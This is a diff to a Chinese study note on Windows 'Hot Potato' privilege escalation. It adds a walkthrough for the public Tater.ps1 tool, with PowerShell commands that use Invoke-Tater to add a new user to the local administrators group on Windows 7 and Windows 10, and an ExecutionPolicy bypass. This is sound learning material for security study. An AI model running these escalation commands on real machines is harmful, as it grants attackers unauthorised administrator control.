--- a/docs/网络安全/端点安全/Windows/提权/土豆提权.md
+++ b/docs/网络安全/端点安全/Windows/提权/土豆提权.md
@@ -65,6 +65,8 @@
 > [015. Hot Potato | Windows Privilege Escalation / root@kali / Youtube](https://www.youtube.com/watch?v=pOuhpcG87G4)
 >
 > [域渗透之热土豆的提权-创建新用户 / CSDN](https://blog.csdn.net/weixin_45612728/article/details/123010630)
+>
+> [HotPotato提权 / whale_3070 / BiliBili](https://www.bilibili.com/video/BV1rj411f7no/?vd_source=bb4d7b2841dd4d0035c93d44ba5cf11a)
 
 HotPotato 利用 Windows 中的已知问题在默认配置中获得本地权限提升
 
@@ -105,6 +107,84 @@ Potato.exe -ip [本机ip] -cmd "命令行（可执行程序路径）" -enable_ht
 > TODO: 需要一个成功利用的截图
 
 ![image-20241212150813472](http://cdn.ayusummer233.top/DailyNotes/202412121508790.png)
+
+---
+
+## Tater
+
+> [Tater / Kevin-Robertson / Github](https://github.com/Kevin-Robertson/Tater)
+>
+> [HotPotato提权 / whale_3070 / BiliBili](https://www.bilibili.com/video/BV1rj411f7no/?vd_source=bb4d7b2841dd4d0035c93d44ba5cf11a)
+
+---
+
+### 利用过程
+
+Clone [Tater / Kevin-Robertson / Github](https://github.com/Kevin-Robertson/Tater) 到本地，打开 powershell 并 cd 到项目根目录， 或者单独把 `Tater.ps1` 取出来也是一样的
+
+![image-20241213162121820](http://cdn.ayusummer233.top/DailyNotes/202412131621980.png)
+
+```powershell
+# 加载 Tater.ps1
+Import-Module ./Tater.ps1
+## 或者用 . ./Tater.ps1 也可以
+```
+
+---
+
+#### Windows 7 使用 trigger 1 （NBNS WPAD Bruteforce + Windows Defender Signature Updates）
+
+```bash
+net localgroup administrators
+. .\Tater.ps1
+Invoke-Tater -Command "net localgroup administrators userTater1 /add"
+net localgroup administrators
+```
+
+![image-20241213171641088](http://cdn.ayusummer233.top/DailyNotes/202412131716224.png)
+
+![image-20241213172938788](http://cdn.ayusummer233.top/DailyNotes/202412131729861.png)
+
+![image-20241213173314156](http://cdn.ayusummer233.top/DailyNotes/202412131733228.png)
+
+![image-20241213173451830](http://cdn.ayusummer233.top/DailyNotes/202412131734921.png)
+
+---
+
+![image-20241213174137926](http://cdn.ayusummer233.top/DailyNotes/202412131741991.png)
+
+> PS: 如果报错禁止执行脚本的话需要设置下 ExecutionPolicy
+>
+> ```powershell
+> # (需要管理员权限)
+> Set-ExecutionPolicy Unrestricted -force
+> # (不需要管理员权限)
+> Set-ExecutionPolicy Unrestricted -Scope CurrentUser
+> ```
+>
+> ![image-20241213172422464](http://cdn.ayusummer233.top/DailyNotes/202412131724596.png)
+>
+> ![image-20241213172544267](http://cdn.ayusummer233.top/DailyNotes/202412131725342.png)
+
+---
+
+#### Windows 10 using trigger 2 (WebClient Service + Scheduled Task)
+
+```powershell
+net localgroup administrators
+. .\Tater.ps1
+## 如果上一步执行报错则执行此命令，否则跳过
+Set-ExecutionPolicy Unrestricted -Scope CurrentUser
+
+Invoke-Tater -Command "net localgroup administrators tatertest /add" -trigger 2
+net localgroup administrators
+```
+
+
+
+
+
+
 
 
 
